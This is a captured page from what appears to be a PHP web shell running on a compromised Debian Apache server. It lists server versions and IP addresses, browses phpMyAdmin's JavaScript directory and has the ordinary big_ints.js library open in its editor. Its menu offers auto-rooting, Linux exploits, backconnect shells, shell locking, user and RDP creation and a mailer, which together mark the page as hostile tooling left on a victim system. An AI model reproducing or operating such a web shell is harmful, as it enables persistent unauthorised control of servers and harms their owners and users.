Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 216.73.216.105
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
ifk
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
phpmyadmin /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
codemirror
[ DIR ]
drwxr-xr-x
jqplot
[ DIR ]
drwxr-xr-x
jquery
[ DIR ]
drwxr-xr-x
openlayers
[ DIR ]
drwxr-xr-x
pmd
[ DIR ]
drwxr-xr-x
tracekit
[ DIR ]
drwxr-xr-x
transformations
[ DIR ]
drwxr-xr-x
ajax.js
28.9
KB
-rw-r--r--
big_ints.js
1.88
KB
-rw-r--r--
chart.js
17.84
KB
-rw-r--r--
common.js
18.36
KB
-rw-r--r--
config.js
25.86
KB
-rw-r--r--
console.js
57.53
KB
-rw-r--r--
cross_framing_protection.js
468
B
-rw-r--r--
db_central_columns.js
10.63
KB
-rw-r--r--
db_operations.js
5.76
KB
-rw-r--r--
db_qbe.js
2.04
KB
-rw-r--r--
db_search.js
8.42
KB
-rw-r--r--
db_structure.js
15.42
KB
-rw-r--r--
db_tracking.js
3.22
KB
-rw-r--r--
doclinks.js
20.16
KB
-rw-r--r--
error_report.js
9.87
KB
-rw-r--r--
export.js
28.66
KB
-rw-r--r--
functions.js
162.06
KB
-rw-r--r--
get_image.js.php
4.65
KB
-rw-r--r--
get_scripts.js.php
1.93
KB
-rw-r--r--
gis_data_editor.js
14.33
KB
-rw-r--r--
import.js
5.49
KB
-rw-r--r--
indexes.js
26.3
KB
-rw-r--r--
keyhandler.js
3.25
KB
-rw-r--r--
line_counts.php
36.92
KB
-rw-r--r--
makegrid.js
95.13
KB
-rw-r--r--
menu-resizer.js
6.48
KB
-rw-r--r--
messages.php
38.55
KB
-rw-r--r--
microhistory.js
11.22
KB
-rw-r--r--
multi_column_sort.js
2.83
KB
-rw-r--r--
navigation.js
53.8
KB
-rw-r--r--
normalization.js
26.39
KB
-rw-r--r--
page_settings.js
1.66
KB
-rw-r--r--
replication.js
3.03
KB
-rw-r--r--
rte.js
46.45
KB
-rw-r--r--
server_databases.js
4.96
KB
-rw-r--r--
server_plugins.js
525
B
-rw-r--r--
server_privileges.js
16.23
KB
-rw-r--r--
server_status_advisor.js
3.6
KB
-rw-r--r--
server_status_monitor.js
84.43
KB
-rw-r--r--
server_status_processes.js
5.97
KB
-rw-r--r--
server_status_queries.js
950
B
-rw-r--r--
server_status_sorter.js
2.51
KB
-rw-r--r--
server_status_variables.js
3.57
KB
-rw-r--r--
server_user_groups.js
1.34
KB
-rw-r--r--
server_variables.js
5.93
KB
-rw-r--r--
sprintf.js
7.21
KB
-rw-r--r--
sql.js
32.71
KB
-rw-r--r--
tbl_change.js
27.8
KB
-rw-r--r--
tbl_chart.js
13.61
KB
-rw-r--r--
tbl_find_replace.js
1.55
KB
-rw-r--r--
tbl_gis_visualization.js
10.64
KB
-rw-r--r--
tbl_operations.js
12.99
KB
-rw-r--r--
tbl_relation.js
8.35
KB
-rw-r--r--
tbl_select.js
15.07
KB
-rw-r--r--
tbl_structure.js
20.41
KB
-rw-r--r--
tbl_tracking.js
3.44
KB
-rw-r--r--
tbl_zoom_plot_jqplot.js
22.55
KB
-rw-r--r--
whitelist.php
1.1
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : big_ints.js
/* vim: set expandtab sw=4 ts=4 sts=4: */ /** * phpMyAdmin's BigInts library */ /** * @var BigInts object to handle big integers (in string) * as JS can handle upto 53 bits of precision only. */ var BigInts = { /** * Compares two integer strings * * @param int1 the string representation of 1st integer * @param int2 the string representation of 2nd integer * * @return int 0 if equal, < 0 if int1 < int2, else > 0 */ compare: function(int1, int2) { // trim integers int1 = int1.trim(); int2 = int2.trim(); // length of integer strings var len1 = int1.length; var len2 = int2.length; // integer is -ve or not var isNeg1 = (int1[0] === '-'); var isNeg2 = (int2[0] === '-'); // Sign of int1 != int2 then no actual comparison // is needed we can return result directly if (isNeg1 !== isNeg2) { return (isNeg1 === true ? -1 : 1); } // replace - sign with 0 int1[0] = isNeg1 ? '0' : int1[0]; int2[0] = isNeg2 ? '0' : int2[0]; // pad integers with 0 to make them // equal length int1 = BigInts.lpad(int1, len2); int2 = BigInts.lpad(int2, len1); // Now they are good to compare as strings if (int1 !== int2) { return (int1 < int2 ? -1 : 1); } return 0; }, /** * Adds leading zeros to a integer given a total length * * @param int the string representation of the integer * @param total the total length required * * @return int the integer of length given with added leading * zeros if necessary */ lpad: function(int, total){ var len = int.length; var pad = ''; while(len < total) { pad += '0'; len++; } return (pad + int); } };
Close